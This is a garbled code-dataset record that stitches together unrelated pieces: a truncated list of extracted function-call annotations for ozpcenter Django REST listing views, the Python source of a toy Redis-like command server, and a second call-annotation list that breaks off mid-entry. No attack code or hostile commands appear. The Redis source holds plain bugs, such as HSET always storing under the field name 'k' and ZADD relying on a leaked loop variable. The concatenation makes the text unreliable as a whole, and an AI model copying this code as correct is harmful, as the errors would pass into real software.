'(similar_listings)\n', (7720, 7738), False, 'from 
rest_framework.response import Response\n'), ((8352, 8429), 'ozpcenter.api.listing.model_access.get_recommendation_feedback', 'model_access.get_recommendation_feedback', (['self.request.user.username', 'listing'], {}), '(self.request.user.username, listing)\n', (8392, 8429), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((8540, 8611), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk', '(True)'], {}), '(request.user.username, listing_pk, True)\n', (8570, 8611), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((8786, 8894), 'ozpcenter.api.listing.serializers.RecommendationFeedbackSerializer', 'serializers.RecommendationFeedbackSerializer', (['queryset'], {'context': "{'request': request, 'listing': listing}"}), "(queryset, context={'request':\n request, 'listing': listing})\n", (8830, 8894), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((8937, 8951), 'rest_framework.response.Response', 'Response', (['data'], {}), '(data)\n', (8945, 8951), False, 'from rest_framework.response import Response\n'), ((9019, 9090), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk', '(True)'], {}), '(request.user.username, listing_pk, True)\n', (9049, 9090), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((9113, 9231), 'ozpcenter.api.listing.serializers.RecommendationFeedbackSerializer', 'serializers.RecommendationFeedbackSerializer', ([], {'data': 'request.data', 'context': "{'request': request, 'listing': listing}"}), "(data=request.data, context={\n 'request': request, 'listing': listing})\n", (9157, 9231), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((9475, 9532), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_201_CREATED'}), '(serializer.data, 
status=status.HTTP_201_CREATED)\n', (9483, 9532), False, 'from rest_framework.response import Response\n'), ((9610, 9681), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk', '(True)'], {}), '(request.user.username, listing_pk, True)\n', (9640, 9681), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((9701, 9773), 'ozpcenter.api.listing.model_access.get_recommendation_feedback', 'model_access.get_recommendation_feedback', (['request.user.username', 'listing'], {}), '(request.user.username, listing)\n', (9741, 9773), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((9875, 9937), 'ozpcenter.api.listing.model_access.delete_recommendation_feedback', 'model_access.delete_recommendation_feedback', (['listing', 'feedback'], {}), '(listing, feedback)\n', (9918, 9937), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((9953, 9996), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_204_NO_CONTENT'}), '(status=status.HTTP_204_NO_CONTENT)\n', (9961, 9996), False, 'from rest_framework.response import Response\n'), ((12012, 12084), 'ozpcenter.api.listing.model_access.get_listing_activities_for_user', 'model_access.get_listing_activities_for_user', (['self.request.user.username'], {}), '(self.request.user.username)\n', (12056, 12084), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((12455, 12548), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request\n }, many=True)\n", (12492, 12548), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((12571, 12596), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (12579, 12596), False, 'from rest_framework.response import 
Response\n'), ((13987, 14080), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request\n }, many=True)\n", (14024, 14080), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((14103, 14128), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (14111, 14128), False, 'from rest_framework.response import Response\n'), ((15355, 15448), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request\n }, many=True)\n", (15392, 15448), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((15471, 15496), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (15479, 15496), False, 'from rest_framework.response import Response\n'), ((15648, 15725), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': "{'request': request}"}), "(queryset, context={'request': request})\n", (15685, 15725), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((15753, 15778), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (15761, 15778), False, 'from rest_framework.response import Response\n'), ((16579, 16649), 'ozpcenter.api.listing.model_access.get_pending_deletion_listings', 'model_access.get_pending_deletion_listings', (['self.request.user.username'], {}), '(self.request.user.username)\n', (16621, 16649), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((16825, 16918), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': 
"{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request\n }, many=True)\n", (16862, 16918), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((16941, 16966), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (16949, 16966), False, 'from rest_framework.response import Response\n'), ((18613, 18676), 'ozpcenter.api.listing.model_access.get_rejection_listings', 'model_access.get_rejection_listings', (['self.request.user.username'], {}), '(self.request.user.username)\n', (18648, 18676), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((18852, 18945), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request\n }, many=True)\n", (18889, 18945), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((18968, 18993), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (18976, 18993), False, 'from rest_framework.response import Response\n'), ((24290, 24343), 'ozpcenter.api.listing.model_access.get_listings', 'model_access.get_listings', (['self.request.user.username'], {}), '(self.request.user.username)\n', (24315, 24343), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((26299, 26353), 'ozpcenter.api.listing.model_access.put_counts_in_listings_endpoint', 'model_access.put_counts_in_listings_endpoint', (['queryset'], {}), '(queryset)\n', (26343, 26353), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((26855, 26940), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', (['queryset'], {'context': "{'request': request}", 'many': '(True)'}), "(queryset, context={'request': request}, many=True\n )\n", (26884, 26940), True, 'import ozpcenter.api.listing.serializers as 
serializers\n'), ((26960, 26985), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (26968, 26985), False, 'from rest_framework.response import Response\n'), ((29454, 29550), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', ([], {'data': 'request.data', 'context': "{'request': request}", 'partial': '(True)'}), "(data=request.data, context={'request':\n request}, partial=True)\n", (29483, 29550), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((29807, 29864), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_201_CREATED'}), '(serializer.data, status=status.HTTP_201_CREATED)\n', (29815, 29864), False, 'from rest_framework.response import Response\n'), ((30031, 30100), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', (['queryset'], {'context': "{'request': request}"}), "(queryset, context={'request': request})\n", (30060, 30100), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((30295, 30320), 'rest_framework.response.Response', 'Response', (['serializer.data'], {}), '(serializer.data)\n', (30303, 30320), False, 'from rest_framework.response import Response\n'), ((30469, 30503), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['queryset'], {'pk': 'pk'}), '(queryset, pk=pk)\n', (30486, 30503), False, 'from django.shortcuts import get_object_or_404\n'), ((30723, 30795), 'ozpcenter.api.listing.model_access.delete_listing', 'model_access.delete_listing', (['request.user.username', 'listing', 'description'], {}), '(request.user.username, listing, description)\n', (30750, 30795), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((30811, 30854), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_204_NO_CONTENT'}), '(status=status.HTTP_204_NO_CONTENT)\n', (30819, 30854), False, 'from rest_framework.response 
import Response\n'), ((33673, 33780), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', (['instance'], {'data': 'request.data', 'context': "{'request': request}", 'partial': '(True)'}), "(instance, data=request.data, context={\n 'request': request}, partial=True)\n", (33702, 33780), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((34104, 34156), 'rest_framework.response.Response', 'Response', (['serializer.data'], {'status': 'status.HTTP_200_OK'}), '(serializer.data, status=status.HTTP_200_OK)\n', (34112, 34156), False, 'from rest_framework.response import Response\n'), ((35028, 35086), 'ozpcenter.api.listing.model_access.get_self_listings', 'model_access.get_self_listings', (['self.request.user.username'], {}), '(self.request.user.username)\n', (35058, 35086), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((36501, 36572), 'ozpcenter.api.listing.model_access.filter_listings', 'model_access.filter_listings', (['self.request.user.username', 'filter_params'], {}), '(self.request.user.username, filter_params)\n', (36529, 36572), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((38398, 38440), 'ozpcenter.api.listing.model_access_es.SearchParamParser', 'model_access_es.SearchParamParser', (['request'], {}), '(request)\n', (38431, 38440), True, 'import ozpcenter.api.listing.model_access_es as model_access_es\n'), ((38460, 38520), 'ozpcenter.api.listing.model_access_es.search', 'model_access_es.search', (['current_request_username', 'params_obj'], {}), '(current_request_username, params_obj)\n', (38482, 38520), True, 'import ozpcenter.api.listing.model_access_es as model_access_es\n'), ((38536, 38580), 'rest_framework.response.Response', 'Response', (['results'], {'status': 'status.HTTP_200_OK'}), '(results, status=status.HTTP_200_OK)\n', (38544, 38580), False, 'from rest_framework.response import Response\n'), ((38766, 38813), 
'ozpcenter.api.listing.model_access_es.SearchParamParser', 'model_access_es.SearchParamParser', (['self.request'], {}), '(self.request)\n', (38799, 38813), True, 'import ozpcenter.api.listing.model_access_es as model_access_es\n'), ((38833, 38894), 'ozpcenter.api.listing.model_access_es.suggest', 'model_access_es.suggest', (['current_request_username', 'params_obj'], {}), '(current_request_username, params_obj)\n', (38856, 38894), True, 'import ozpcenter.api.listing.model_access_es as model_access_es\n'), ((38910, 38954), 'rest_framework.response.Response', 'Response', (['results'], {'status': 'status.HTTP_200_OK'}), '(results, status=status.HTTP_200_OK)\n', (38918, 38954), False, 'from rest_framework.response import Response\n'), ((39062, 39110), 'ozpcenter.errors.NotImplemented', 'errors.NotImplemented', (['"""HTTP Verb Not Supported"""'], {}), "('HTTP Verb Not Supported')\n", (39083, 39110), False, 'from ozpcenter import errors\n'), ((39229, 39277), 'ozpcenter.errors.NotImplemented', 'errors.NotImplemented', (['"""HTTP Verb Not Supported"""'], {}), "('HTTP Verb Not Supported')\n", (39250, 39277), False, 'from ozpcenter import errors\n'), ((39394, 39442), 'ozpcenter.errors.NotImplemented', 'errors.NotImplemented', (['"""HTTP Verb Not Supported"""'], {}), "('HTTP Verb Not Supported')\n", (39415, 39442), False, 'from ozpcenter import errors\n'), ((39567, 39615), 'ozpcenter.errors.NotImplemented', 'errors.NotImplemented', (['"""HTTP Verb Not Supported"""'], {}), "('HTTP Verb Not Supported')\n", (39588, 39615), False, 'from ozpcenter import errors\n'), ((39733, 39781), 'ozpcenter.errors.NotImplemented', 'errors.NotImplemented', (['"""HTTP Verb Not Supported"""'], {}), "('HTTP Verb Not Supported')\n", (39754, 39781), False, 'from ozpcenter import errors\n'), ((2747, 2822), 'ozpcenter.api.listing.serializers.ReviewSerializer', 'serializers.ReviewSerializer', (['page'], {'context': "{'request': request}", 'many': '(True)'}), "(page, context={'request': request}, 
many=True)\n", (2775, 2822), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((8704, 8763), 'rest_framework.response.Response', 'Response', (["{'feedback': 0}"], {'status': 'status.HTTP_404_NOT_FOUND'}), "({'feedback': 0}, status=status.HTTP_404_NOT_FOUND)\n", (8712, 8763), False, 'from rest_framework.response import Response\n'), ((9823, 9865), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_404_NOT_FOUND'}), '(status=status.HTTP_404_NOT_FOUND)\n', (9831, 9865), False, 'from rest_framework.response import Response\n'), ((12269, 12357), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['page'], {'context': "{'request': request}", 'many': '(True)'}), "(page, context={'request': request},\n many=True)\n", (12306, 12357), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((13801, 13889), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['page'], {'context': "{'request': request}", 'many': '(True)'}), "(page, context={'request': request},\n many=True)\n", (13838, 13889), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((15169, 15257), 'ozpcenter.api.listing.serializers.ListingActivitySerializer', 'serializers.ListingActivitySerializer', (['page'], {'context': "{'request': request}", 'many': '(True)'}), "(page, context={'request': request},\n many=True)\n", (15206, 15257), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((17048, 17103), 'ozpcenter.model_access.get_profile', 'generic_model_access.get_profile', (['request.user.username'], {}), '(request.user.username)\n', (17080, 17103), True, 'import ozpcenter.model_access as generic_model_access\n'), ((17126, 17191), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk'], {}), '(request.user.username, listing_pk)\n', (17156, 
17191), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((17465, 17528), 'ozpcenter.api.listing.model_access.pending_delete_listing', 'model_access.pending_delete_listing', (['user', 'listing', 'description'], {}), '(user, listing, description)\n', (17500, 17528), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((17548, 17626), 'rest_framework.response.Response', 'Response', ([], {'data': "{'listing': {'id': listing.id}}", 'status': 'status.HTTP_201_CREATED'}), "(data={'listing': {'id': listing.id}}, status=status.HTTP_201_CREATED)\n", (17556, 17626), False, 'from rest_framework.response import Response\n'), ((19075, 19130), 'ozpcenter.model_access.get_profile', 'generic_model_access.get_profile', (['request.user.username'], {}), '(request.user.username)\n', (19107, 19130), True, 'import ozpcenter.model_access as generic_model_access\n'), ((19153, 19218), 'ozpcenter.api.listing.model_access.get_listing_by_id', 'model_access.get_listing_by_id', (['request.user.username', 'listing_pk'], {}), '(request.user.username, listing_pk)\n', (19183, 19218), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((19321, 19386), 'ozpcenter.api.listing.model_access.reject_listing', 'model_access.reject_listing', (['user', 'listing', 'rejection_description'], {}), '(user, listing, rejection_description)\n', (19348, 19386), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((19422, 19500), 'rest_framework.response.Response', 'Response', ([], {'data': "{'listing': {'id': listing.id}}", 'status': 'status.HTTP_201_CREATED'}), "(data={'listing': {'id': listing.id}}, status=status.HTTP_201_CREATED)\n", (19430, 19500), False, 'from rest_framework.response import Response\n'), ((26578, 26654), 'ozpcenter.api.listing.serializers.ListingSerializer', 'serializers.ListingSerializer', (['page'], {'context': "{'request': request}", 'many': '(True)'}), "(page, context={'request': request}, many=True)\n", (26607, 
26654), True, 'import ozpcenter.api.listing.serializers as serializers\n'), ((30643, 30713), 'ozpcenter.errors.InvalidInput', 'errors.InvalidInput', (['"""Description is required when deleting a listing"""'], {}), "('Description is required when deleting a listing')\n", (30662, 30713), False, 'from ozpcenter import errors\n'), ((13400, 13467), 'ozpcenter.api.listing.model_access.get_all_listing_activities', 'model_access.get_all_listing_activities', (['self.request.user.username'], {}), '(self.request.user.username)\n', (13439, 13467), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((14724, 14791), 'ozpcenter.api.listing.model_access.get_all_listing_activities', 'model_access.get_all_listing_activities', (['self.request.user.username'], {}), '(self.request.user.username)\n', (14763, 14791), True, 'import ozpcenter.api.listing.model_access as model_access\n'), ((17359, 17446), 'ozpcenter.errors.InvalidInput', 'errors.InvalidInput', (['"""Description is required when pending a listing for deletion"""'], {}), "(\n 'Description is required when pending a listing for deletion')\n", (17378, 17446), False, 'from ozpcenter import errors\n'), ((17772, 17833), 'ozpcenter.errors.RequestException', 'errors.RequestException', (['"""Error pending listing for deletion"""'], {}), "('Error pending listing for deletion')\n", (17795, 17833), False, 'from ozpcenter import errors\n'), ((19646, 19696), 'ozpcenter.errors.RequestException', 'errors.RequestException', (['"""Error rejecting listing"""'], {}), "('Error rejecting listing')\n", (19669, 19696), False, 'from ozpcenter import errors\n'), ((30250, 30278), 'operator.itemgetter', 'operator.itemgetter', (['"""order"""'], {}), "('order')\n", (30269, 30278), False, 'import operator\n'), ((7457, 7502), 'ozpcenter.recommend.recommend_utils.ListIterator', 'recommend_utils.ListIterator', (['serializer.data'], {}), '(serializer.data)\n', (7485, 7502), False, 'from ozpcenter.recommend import recommend_utils\n'), 
((7547, 7620), 'ozpcenter.pipe.pipes.ListingDictPostSecurityMarkingCheckPipe', 'pipes.ListingDictPostSecurityMarkingCheckPipe', (['self.request.user.username'], {}), '(self.request.user.username)\n', (7592, 7620), False, 'from ozpcenter.pipe import pipes\n'), ((7665, 7684), 'ozpcenter.pipe.pipes.LimitPipe', 'pipes.LimitPipe', (['(10)'], {}), '(10)\n', (7680, 7684), False, 'from ozpcenter.pipe import pipes\n'), ((26035, 26047), 'django.db.models.functions.Lower', 'Lower', (['field'], {}), '(field)\n', (26040, 26047), False, 'from django.db.models.functions import Lower\n'), ((7084, 7113), 'django.db.models.functions.Lower', 'Lower', (['"""owners__display_name"""'], {}), "('owners__display_name')\n", (7089, 7113), False, 'from django.db.models.functions import Lower\n'), ((25243, 25272), 'django.db.models.functions.Lower', 'Lower', (['"""owners__display_name"""'], {}), "('owners__display_name')\n", (25248, 25272), False, 'from django.db.models.functions import Lower\n'), ((25936, 25952), 'django.db.models.functions.Lower', 'Lower', (['field[1:]'], {}), '(field[1:])\n', (25941, 25952), False, 'from django.db.models.functions import Lower\n')] |
import re
import time
import random
from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array
class RedisCommand(object):
    """A single parsed Redis command bound to a datastore.

    Each upper-case method implements the Redis command of the same name
    and returns a ``(db_action, serialized_reply)`` tuple.  ``db_action``
    tells the connection handler what to do next: 0 = nothing,
    1 = close the connection, 10 + n = switch to database n,
    20 = flush every database.

    Plain string values are stored on the datastore as ``(value, expire)``
    tuples, where ``expire`` is an absolute Unix timestamp or ``None``.
    """

    def __init__(self, command, arguments, database_manager):
        self.command = command.upper()
        self.arguments = arguments
        # database_manager is a (num_databases, datastore) pair.
        self.num_databases = database_manager[0]
        self.datastore = database_manager[1]

    @classmethod
    def from_handler(cls, arguments, database_manager):
        """Build a command from a raw RESP payload received by the handler."""
        arguments = deserialize(arguments)
        return cls(arguments[0], arguments[1:], database_manager)

    def execute(self):
        """Dispatch to the method named after the command.

        Raises AttributeError for unknown commands; the handler is
        expected to turn that into an error reply.
        """
        return getattr(self, self.command)()

    def QUIT(self):
        """QUIT: acknowledge and signal the handler to close the connection."""
        return (1, serialize_string('OK'))

    def PING(self):
        """PING [message]: echo the message, or PONG when none was given."""
        if self.arguments:
            return (0, serialize_string('{}'.format(' '.join(self.arguments))))
        else:
            return (0, serialize_string('PONG'))

    def ECHO(self):
        """ECHO message: return the message as a bulk string."""
        return (0, serialize_bulk_string('{}'.format(' '.join(self.arguments))))

    def SELECT(self):
        """SELECT index: switch the connection to another database."""
        db = int(self.arguments[0])
        if db > self.num_databases:
            return (0, serialize_error('ERR DB index is out of range'))
        else:
            # 10 + db encodes "switch to database db" for the handler.
            return (10 + db, serialize_string('OK'))

    def COMMAND(self):
        """COMMAND: list every supported command (all upper-case attributes)."""
        output = ''
        for item in dir(self):
            if item.isupper():
                output += '{}\n'.format(item)
        return (0, serialize_array('{}'.format(output)))

    def KEYS(self):
        """KEYS pattern: return every key matching the (regex) pattern.

        Only '*' is translated to a regex; any other pattern is used as a
        raw regular expression, not Redis glob syntax.
        """
        if self.arguments[0] == '*':
            pattern = '.*'
        else:
            pattern = self.arguments[0]
        pattern = re.compile(pattern)
        output = ''
        for value in vars(self.datastore):
            if pattern.search(value):
                output += '{}\n'.format(value)
        return (0, serialize_array('{}'.format(output)))

    def FLUSHDB(self):
        """FLUSHDB: empty the current database."""
        self.datastore.flush()
        return (0, serialize_string('OK'))

    def FLUSHALL(self):
        """FLUSHALL: signal the handler (action 20) to empty every database."""
        return (20, serialize_string('OK'))

    def SET(self):
        """SET key value [EX seconds]: store value with an optional expiry."""
        key = self.arguments[0]
        value = self.arguments[1]
        mode = None
        expire = None
        for option in self.arguments[2:]:
            if mode == 'EX':
                # The previous token was EX, so this one is the TTL in seconds.
                expire = int(time.time()) + int(option)
            mode = option
        setattr(self.datastore, key, (value, expire))
        return (0, serialize_string('OK'))

    def GET(self):
        """GET key: return the value, or nil if missing or expired."""
        key = self.arguments[0]
        try:
            value, expire = getattr(self.datastore, key)
        except (AttributeError, TypeError, ValueError):
            # Missing key, or the stored object is not a (value, expire) pair.
            return (0, serialize_bulk_string(None))
        if expire is not None and expire <= int(time.time()):
            # Lazy expiry: drop the key on first access past its deadline.
            self.DEL(key)
            return (0, serialize_bulk_string(None))
        return (0, serialize_bulk_string('{}'.format(value)))

    def DEL(self, key=None):
        """DEL key [key ...]: delete keys; reply with how many were removed.

        When called internally with an explicit ``key`` (e.g. from GET's
        lazy expiry), a single key is deleted and no reply is produced.
        """
        if key is not None:
            delattr(self.datastore, key)
            return
        deleted = 0
        for name in self.arguments:
            try:
                delattr(self.datastore, name)
                deleted += 1
            except AttributeError:
                # Missing keys are ignored, matching Redis semantics.
                pass
        return (0, serialize_integer('{}'.format(deleted)))

    def DBSIZE(self):
        """DBSIZE: return the number of keys in the current database."""
        return (0, serialize_integer('{}'.format(len(vars(self.datastore)))))

    def INCR(self):
        """INCR key: increment the integer value at key, creating it at 0."""
        key = self.arguments[0]
        value, expire = getattr(self.datastore, key, (0, None))
        try:
            value = int(value) + 1
        except (TypeError, ValueError):
            return (0, serialize_error('ERR value is not an integer or out of range'))
        setattr(self.datastore, key, (value, expire))
        return (0, serialize_integer('{}'.format(value)))

    def ZADD(self):
        """ZADD key score member: insert member keeping the array score-sorted."""
        key = self.arguments[0]
        score = self.arguments[1]
        member = self.arguments[2]
        array = getattr(self.datastore, key, list())
        # Drop any existing entry for this member before re-inserting it.
        # (The previous code read the leaked comprehension variable, which
        # raises NameError on Python 3.)
        array = [item for item in array if item[1] != member]
        array.append((score, member))
        array.sort(key=lambda item: item[0])
        setattr(self.datastore, key, array)
        return (0, serialize_integer('1'))

    def ZCARD(self):
        """ZCARD key: return the number of members in the sorted set."""
        array = getattr(self.datastore, self.arguments[0], list())
        return (0, serialize_integer('{}'.format(len(array))))

    def ZRANK(self):
        """ZRANK key member: return the member's rank, or nil if absent."""
        key = self.arguments[0]
        member = self.arguments[1]
        array = getattr(self.datastore, key, list())
        positions = [position for position, item in enumerate(array)
                     if item[1] == member]
        if not positions:
            return (0, serialize_bulk_string(None))
        return (0, serialize_integer('{}'.format(positions[0])))

    def ZRANGE(self):
        """ZRANGE key start stop: return the members in the given rank range."""
        key = self.arguments[0]
        start = int(self.arguments[1])
        stop = int(self.arguments[2])
        array = getattr(self.datastore, key, list())
        if abs(start) > len(array):
            return (0, serialize_array(''))
        if abs(stop) > len(array) or stop == -1:
            # Out-of-range or -1 stop means "through the end of the array".
            stop = None
        output = ''
        for value in [value[1] for value in array[start:stop]]:
            output += '{}\n'.format(value)
        return (0, serialize_array('{}'.format(output)))

    def LPUSH(self):
        """LPUSH key value: prepend value; reply with the new list length."""
        key = self.arguments[0]
        value = self.arguments[1]
        array = getattr(self.datastore, key, list())
        array.insert(0, value)
        setattr(self.datastore, key, array)
        return (0, serialize_integer('{}'.format(len(array))))

    def RPUSH(self):
        """RPUSH key value: append value; reply with the new list length."""
        key = self.arguments[0]
        value = self.arguments[1]
        array = getattr(self.datastore, key, list())
        array.append(value)
        setattr(self.datastore, key, array)
        return (0, serialize_integer('{}'.format(len(array))))

    def LPOP(self):
        """LPOP key: pop and return the head of the list, or nil if empty."""
        key = self.arguments[0]
        array = getattr(self.datastore, key, list())
        try:
            result = array.pop(0)
        except IndexError:
            result = None
        return (0, serialize_bulk_string(result))

    def RPOP(self):
        """RPOP key: pop and return the tail of the list, or nil if empty."""
        key = self.arguments[0]
        array = getattr(self.datastore, key, list())
        try:
            result = array.pop()
        except IndexError:
            result = None
        return (0, serialize_bulk_string(result))

    def SADD(self):
        """SADD key member: add member to the set stored at key."""
        key = self.arguments[0]
        member = self.arguments[1]
        array = getattr(self.datastore, key, set())
        array.add(member)
        setattr(self.datastore, key, array)
        return (0, serialize_integer('1'))

    def HSET(self):
        """HSET key field value: set one field of the hash stored at key."""
        key = self.arguments[0]
        field = self.arguments[1]
        value = self.arguments[2]
        data = getattr(self.datastore, key, dict())
        # The previous data.update(k=value) always wrote the literal field
        # name 'k' instead of the requested field.
        data[field] = value
        setattr(self.datastore, key, data)
        return (0, serialize_integer('1'))

    def SPOP(self):
        """SPOP key: remove and return an arbitrary member of the set."""
        key = self.arguments[0]
        array = getattr(self.datastore, key, None)
        if array is None:
            return (0, serialize_bulk_string(None))
        try:
            result = array.pop()
        except KeyError:
            return (0, serialize_bulk_string(None))
        setattr(self.datastore, key, array)
        return (0, serialize_bulk_string(result))

    def LRANGE(self):
        """LRANGE key start stop: return the list slice, stop inclusive."""
        key = self.arguments[0]
        start = int(self.arguments[1])
        stop = int(self.arguments[2])
        array = getattr(self.datastore, key, list())
        output = ''
        if stop == -1:
            stop = None
        else:
            # Redis stop indices are inclusive; Python slices are exclusive.
            stop += 1
        for value in array[start:stop]:
            output += '{}\n'.format(value)
        return (0, serialize_array('{}'.format(output)))

    def MSET(self):
        """MSET key value [key value ...]: set several keys at once."""
        arguments = iter(self.arguments)
        for key in arguments:
            setattr(self.datastore, key, (next(arguments), None))
        return (0, serialize_string('OK'))
| [
"redis_protocol.protocol.serialize_integer",
"re.compile",
"redis_protocol.protocol.serialize_string",
"redis_protocol.protocol.serialize_array",
"redis_protocol.protocol.serialize_error",
"redis_protocol.protocol.deserialize",
"time.time",
"redis_protocol.protocol.serialize_bulk_string"
] | [((525, 547), 'redis_protocol.protocol.deserialize', 'deserialize', (['arguments'], {}), '(arguments)\n', (536, 547), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((1698, 1717), 're.compile', 're.compile', (['pattern'], {}), '(pattern)\n', (1708, 1717), False, 'import re\n'), ((781, 803), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (797, 803), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((1997, 2019), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (2013, 2019), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((2066, 2088), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (2082, 2088), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((2470, 2492), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (2486, 2492), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((4199, 4221), 'redis_protocol.protocol.serialize_integer', 'serialize_integer', (['"""1"""'], {}), "('1')\n", (4216, 4221), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((6124, 6153), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['result'], {}), '(result)\n', (6145, 6153), False, 'from redis_protocol.protocol import deserialize, serialize_string, 
serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((6379, 6408), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['result'], {}), '(result)\n', (6400, 6408), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((6639, 6661), 'redis_protocol.protocol.serialize_integer', 'serialize_integer', (['"""1"""'], {}), "('1')\n", (6656, 6661), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((6923, 6945), 'redis_protocol.protocol.serialize_integer', 'serialize_integer', (['"""1"""'], {}), "('1')\n", (6940, 6945), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((7315, 7344), 'redis_protocol.protocol.serialize_bulk_string', 'serialize_bulk_string', (['result'], {}), '(result)\n', (7336, 7344), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((7951, 7973), 'redis_protocol.protocol.serialize_string', 'serialize_string', (['"""OK"""'], {}), "('OK')\n", (7967, 7973), False, 'from redis_protocol.protocol import deserialize, serialize_string, serialize_error, serialize_integer, serialize_bulk_string, serialize_array\n'), ((970, 994), 